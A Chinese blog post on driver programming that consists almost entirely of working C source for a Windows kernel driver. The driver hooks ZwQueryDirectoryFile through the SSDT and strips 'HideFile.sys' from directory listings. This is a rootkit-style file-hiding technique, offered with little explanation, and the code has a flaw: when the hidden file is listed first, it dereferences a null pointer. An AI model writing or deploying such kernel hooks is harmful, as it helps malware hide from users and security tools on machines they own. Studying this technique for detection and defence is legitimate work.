注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

从C开始

 
 
 

日志

 
 

hook ZwQueryDirectoryFile实现文件隐藏  

2011-06-10 16:54:39|  分类: 驱动编程 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
隐藏文件, 主要是SSDT HOOK ZwQueryDirectoryFile函数.

#include
 <ntddk.h>

typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

typedef struct _FILE_BOTH_DIR_INFORMATION {
    ULONG           NextEntryOffset;
    ULONG           FileIndex;
    LARGE_INTEGER   CreationTime;
    LARGE_INTEGER   LastAccessTime;
    LARGE_INTEGER   LastWriteTime;
    LARGE_INTEGER   ChangeTime;
    LARGE_INTEGER   EndOfFile;
    LARGE_INTEGER   AllocationSize;
    ULONG           FileAttributes;
    ULONG           FileNameLength;
    ULONG           EaSize;
    CCHAR           ShortNameLength;
    WCHAR           ShortName[12];
    WCHAR           FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;


// Our System Call Table
PVOID* NewSystemCallTable;

// Our Memory Descriptor List
PMDL pMyMDL;

#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

#define HOOK(functionName, newPointer2Function, oldPointer2Function )  \
       oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

#define UNHOOK(functionName, oldPointer2Function)  \
       InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function)

NTSYSAPI
NTSTATUS
NTAPI ZwQueryDirectoryFile(
                          IN  HANDLE FileHandle,
                          IN  HANDLE Event OPTIONAL,
                          IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                          IN  PVOID ApcContext OPTIONAL,
                          OUT PIO_STATUS_BLOCK IoStatusBlock,
                          OUT PVOID FileInformation,
                          IN  ULONG Length,
                          IN  FILE_INFORMATION_CLASS FileInformationClass,
                          IN  BOOLEAN ReturnSingleEntry,
                          IN  PUNICODE_STRING FileName OPTIONAL,
                          IN  BOOLEAN RestartScan
                          );

typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)(
                              IN  HANDLE FileHandle,
                              IN  HANDLE Event OPTIONAL,
                              IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                              IN  PVOID ApcContext OPTIONAL,
                              OUT PIO_STATUS_BLOCK IoStatusBlock,
                              OUT PVOID FileInformation,
                              IN  ULONG Length,
                              IN  FILE_INFORMATION_CLASS FileInformationClass,
                              IN  BOOLEAN ReturnSingleEntry,
                              IN  PUNICODE_STRING FileName OPTIONAL,
                              IN  BOOLEAN RestartScan
                              );

ZWQUERYDIRECTORYFILE        OldZwQueryDirectoryFile;

NTSTATUS NewZwQueryDirectoryFile(
  IN  HANDLE FileHandle,
  IN  HANDLE Event OPTIONAL,
  IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
  IN  PVOID ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK IoStatusBlock,
  OUT PVOID FileInformation,
  IN  ULONG Length,
  IN  FILE_INFORMATION_CLASS FileInformationClass,
  IN  BOOLEAN ReturnSingleEntry,
  IN  PUNICODE_STRING FileName OPTIONAL,
  IN  BOOLEAN RestartScan
  )
{
    NTSTATUS status;
    ANSI_STRING ansiFileName,ansiDirName,HideDirFile;
    UNICODE_STRING uniFileName;
    
    RtlInitAnsiString(&HideDirFile,"HideFile.sys"); 
    KdPrint(("NewZwQueryDirectoryFile called."));
    
    status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
        FileHandle,
        Event,
        ApcRoutine,
        ApcContext,
        IoStatusBlock,
        FileInformation,
        Length,
        FileInformationClass,
        ReturnSingleEntry,
        FileName,
        RestartScan);

    //这部分是隐藏文件的核心部分
    if( NT_SUCCESS(status) && FileInformationClass == FileBothDirectoryInformation )
    {
        PFILE_BOTH_DIR_INFORMATION pFileInfo;
        PFILE_BOTH_DIR_INFORMATION pLastFileInfo;
        BOOLEAN bLastOne;

        pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation; 
        pLastFileInfo = NULL;

        do
        {
            bLastOne = !( pFileInfo->NextEntryOffset );
            RtlInitUnicodeString(&uniFileName, pFileInfo->FileName);
            RtlUnicodeStringToAnsiString(&ansiFileName, &uniFileName, TRUE);
            RtlUnicodeStringToAnsiString(&ansiDirName, &uniFileName, TRUE);
            
            KdPrint(("Hide File: %Z\n", &ansiFileName));

            if( RtlCompareMemory(ansiFileName.Buffer, HideDirFile.Buffer, HideDirFile.Length ) == HideDirFile.Length)
            {
                if(bLastOne) 
                {
                    pLastFileInfo->NextEntryOffset = 0;
                    break;
                } 
                else //指针往后移动
                {
                    int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;
                    int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;
                    RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
                    continue;
                }
            }

            pLastFileInfo = pFileInfo;
            pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);

        }while(!bLastOne);

        RtlFreeAnsiString(&ansiDirName); 
        RtlFreeAnsiString(&ansiFileName);
    }
    
    return status;
}

NTSTATUS Hook( )
{
    pMyMDL = MmCreateMdl(  NULL,
        KeServiceDescriptorTable.ServiceTableBase,
        KeServiceDescriptorTable.NumberOfServices * 4 );
    
    if( !pMyMDL )
        return( STATUS_UNSUCCESSFUL );
    
    MmBuildMdlForNonPagedPool( pMyMDL );
    pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
    NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );
    
    if( !NewSystemCallTable )
        return( STATUS_UNSUCCESSFUL );
    
    HOOK( ZwQueryDirectoryFile,NewZwQueryDirectoryFile ,OldZwQueryDirectoryFile);
    
    return( STATUS_SUCCESS );
}

NTSTATUS UnHook( )
{
    if( NewSystemCallTable )
    {
        UNHOOK( ZwQueryDirectoryFile, OldZwQueryDirectoryFile );
        MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
        IoFreeMdl( pMyMDL );
    }
    return( STATUS_SUCCESS );
}

NTSTATUS OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    NTSTATUS status;
    KdPrint(("OnUnload called\n"));
    status = UnHook();
    return status;
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,

                     IN PUNICODE_STRING theRegistryPath)

{
    NTSTATUS       status = STATUS_SUCCESS;

    KdPrint(("Enter DriverEntry!"));

    theDriverObject->DriverUnload  = OnUnload;

    Hook();

    return STATUS_SUCCESS;
}
  评论这张
 
阅读(2338)| 评论(1)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018